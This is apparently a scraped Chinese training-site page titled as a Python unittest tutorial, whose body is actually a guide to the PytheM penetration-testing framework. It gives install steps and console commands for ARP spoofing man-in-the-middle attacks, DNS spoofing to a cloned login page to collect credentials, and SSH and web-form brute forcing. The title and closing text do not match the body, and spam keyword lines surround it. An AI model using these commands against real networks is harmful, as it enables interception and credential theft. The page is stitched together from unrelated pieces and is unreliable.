久久精品国产亚洲高清|精品日韩中文乱码在线|亚洲va中文字幕无码久|伊人久久综合狼伊人久久|亚洲不卡av不卡一区二区|精品久久久久久久蜜臀AV|国产精品19久久久久久不卡|国产男女猛烈视频在线观看麻豆

    1. <style id="76ofp"></style>

      <style id="76ofp"></style>
      <rt id="76ofp"></rt>
      <form id="76ofp"><optgroup id="76ofp"></optgroup></form>
      1. 千鋒教育-做有情懷、有良心、有品質(zhì)的職業(yè)教育機構(gòu)

        手機站
        千鋒教育

        千鋒學(xué)習(xí)站 | 隨時隨地免費學(xué)

        千鋒教育

        掃一掃進入千鋒手機站

        領(lǐng)取全套視頻
        千鋒教育

        關(guān)注千鋒學(xué)習(xí)站小程序
        隨時隨地免費學(xué)習(xí)課程

        當(dāng)前位置:首頁  >  技術(shù)干貨  > Python的Unittest單元測試使用詳解

        Python的Unittest單元測試使用詳解

        來源:千鋒教育
        發(fā)布人:xqq
        時間: 2023-11-06 21:21:54 1699276914

        PytheM是一個Python滲透測試框架。它只能在osnGNU/LinuxOS系統(tǒng)上運行。

        安裝

        $sudoapt-getupdate$sudoapt-getinstalllibasound-devlibjack-jackd2-devportaudio19-devpython-pyaudiobuild-essentialpython-devlibnetfilter-queue-devlibespeak1libffi-devlibssl-dev$sudogitclonehttps://github.com/m4n3dw0lf/PytheM/$cdPytheM$sudopipinstall-rrequirements.txt

        運行

        $sudo./pythem

        例子

        ARP欺騙-HTTP中間人攻擊

        命令:

        pythem>setinterface[+]Entertheinterface:wlan0pythem>setgateway[+]Enterthegateway:192.168.1.1pythem>arpspoofstart[+]Settingthepacketforwarding.[+]Iptablesredefined.[+]ARPspoofinginitialized.pythem>sniff[+]Enterthefilter:http

        ARP+DNS欺騙-重定向到偽造的頁面,收集登錄憑證

        使用SET等克隆工具克隆你選中的網(wǎng)站,并部署在Apache2上

        命令:

        pythem>settarget[+]Enterthetarget(s):192.168.0.8pythem>setinterfacewlan0pythem>setgateway192.168.0.1pythem>arpspoofstart[+]Settingthepacketforwarding.[+]Iptablesredefined.[+]ARPspoofinginitialized.pythem>dnsspoofstart[+]Domaintobespoofed:www.google.com[+]IPaddresstoberedirected:192.168.0.6[+]DNSspoofinginitialized.pythem>sniffdns

        SSH暴破-暴力破解

        pythem>servicesshstartpythem>settarget[+]Enterthetarget(s):127.0.0.1pythem>setfilewordlist.txtpythem>brute-forcessh[+]Entertheusernametobruteforce:anon123

        Web頁面參數(shù)暴力破解

        首先獲取web頁面登錄時的參數(shù)格式id=value

        顯示重定向頁面,如果定向到一個不同的頁面則說明猜解正確。

        命令

        pythem>settargethttp://127.0.0.1/pythem>setfile[+]Enterthepathtothefile:wordlist.txtpythem>brute-forcewebform[+]Brute-Formauthenticationinitialized.[+]Entertheinputidoftheusernamebox:vSIS_ID[+]Entertheinputidofthepasswordbox:vSIS_PASS[+]Entertheusernametobrute-forcetheformulary:root

        URL內(nèi)容爆破

        pythem>settarget[+]Enterthetarget(s):http://testphp.vulnweb.com/index.php?id=pythem>setfile1to100.txtpythem>brute-forceurl[+]ContentURLbruterinitialized.

        功能

        [PytheM–PenetrationTestingFrameworkv0.3.2]

        help:

        打印幫助信息。

        exit/quit:

        退出程序。

        set:

        設(shè)置變量的值,參數(shù):

        interface

        gateway

        target

        file

        arpmode例子:

        pythem>setinterface|openinputtoset

        或者

        pythem>setinterfacewlan0|don'topeninputtosetvalue

        print:

        打印變量的值,例子:

        pythem>printgateway

        scan:

        進行tcp/manualport/arp掃描.

        (應(yīng)該在設(shè)置完網(wǎng)卡和目標(biāo)后再調(diào)用)例子:

        pythem>scan

        或者

        pythem>scantcp

        arpspoof:

        開始或結(jié)束arpspoofing攻擊.(使用rep或req可以設(shè)置arp欺騙的模式,rep表示欺騙響應(yīng),req表示欺騙請求)

        參數(shù)

        start

        stop

        例子:

        arpspoofstartarpspoofstop

        dnsspoof:

        開始dnsspoofing攻擊.(應(yīng)該在arp欺騙攻擊開始后再調(diào)用)例子:

        pythem>dnsspoofstartpythem>dnsspoofstop

        sniff:

        開始嗅探數(shù)據(jù)包(應(yīng)該在設(shè)置網(wǎng)卡后再調(diào)用)例子:

        pythem>sniffhttp

        或者

        pythem>sniff

        [+]Enterthefilter:port1337andhost10.0.1.5|tcpdumplikeformatorhttp,dnsspecificfilter.

        pforensic:

        開始分析數(shù)據(jù)包(應(yīng)該在設(shè)置完網(wǎng)卡和.pcap文件后調(diào)用)例子:

        pythem>pforensicpforensic>help

        brute-force:

        開始暴力破解攻擊(應(yīng)該在設(shè)置完目標(biāo)和字典文件路徑后調(diào)用)參數(shù):

        ssh|目標(biāo)是IP地址ipaddressastargeturl|目標(biāo)是url(包含http://或https://)webform|目標(biāo)是url(包含http://或https://)例子:pythem>brute-forcewebformpythem>brute-forcessh

        geoip:

        顯示IP地址的大概位置(應(yīng)該在設(shè)置目標(biāo)(IP地址)后再調(diào)用)例子:

        pythem>geoip

        或者

        pythem>geoip8.8.8.8

        decodeandencode:

        以選擇的模式解碼和編碼字符串,例子:

        pythem>decodebase64pythem>encodeascii

        cookiedecode:

        解碼base64url編碼的cookie的值,例子:

        pythem>cookiedecode

        其它在控制臺可以執(zhí)行的命令,比如cd,ls,nano,cat等。

        Jarvis–聲音控制助手

        [*]jarvistypejarvis-helptoseethejarvishelppage.examples:pythem>jarvis(以語音識

        以上內(nèi)容為大家介紹了Python的Unittest單元測試使用詳解,希望對大家有所幫助,如果想要了解更多Python相關(guān)知識,請關(guān)注IT培訓(xùn)機構(gòu):千鋒教育。http://www.2667701.com/

        聲明:本站稿件版權(quán)均屬千鋒教育所有,未經(jīng)許可不得擅自轉(zhuǎn)載。
        10年以上業(yè)內(nèi)強師集結(jié),手把手帶你蛻變精英
        請您保持通訊暢通,專屬學(xué)習(xí)老師24小時內(nèi)將與您1V1溝通
        免費領(lǐng)取
        今日已有369人領(lǐng)取成功
        劉同學(xué) 138****2860 剛剛成功領(lǐng)取
        王同學(xué) 131****2015 剛剛成功領(lǐng)取
        張同學(xué) 133****4652 剛剛成功領(lǐng)取
        李同學(xué) 135****8607 剛剛成功領(lǐng)取
        楊同學(xué) 132****5667 剛剛成功領(lǐng)取
        岳同學(xué) 134****6652 剛剛成功領(lǐng)取
        梁同學(xué) 157****2950 剛剛成功領(lǐng)取
        劉同學(xué) 189****1015 剛剛成功領(lǐng)取
        張同學(xué) 155****4678 剛剛成功領(lǐng)取
        鄒同學(xué) 139****2907 剛剛成功領(lǐng)取
        董同學(xué) 138****2867 剛剛成功領(lǐng)取
        周同學(xué) 136****3602 剛剛成功領(lǐng)取
        相關(guān)推薦HOT
        酒泉市| 渝北区| 旌德县| 靖州| 恩平市| 开原市| 郑州市| 滨州市| 新建县| 和林格尔县| 凌海市| 岳普湖县| 仲巴县| 崇文区| 洞头县| 荣昌县| 汾西县| 江北区| 莲花县| 溧阳市| 襄垣县| 德令哈市| 新河县| 宜州市| 唐河县| 钟祥市| 青神县| 司法| 普陀区| 建昌县| 嘉善县| 盘锦市| 铁岭市| 昌吉市| 成都市| 滦平县| 阳东县| 巧家县| 察哈| 依兰县| 密云县|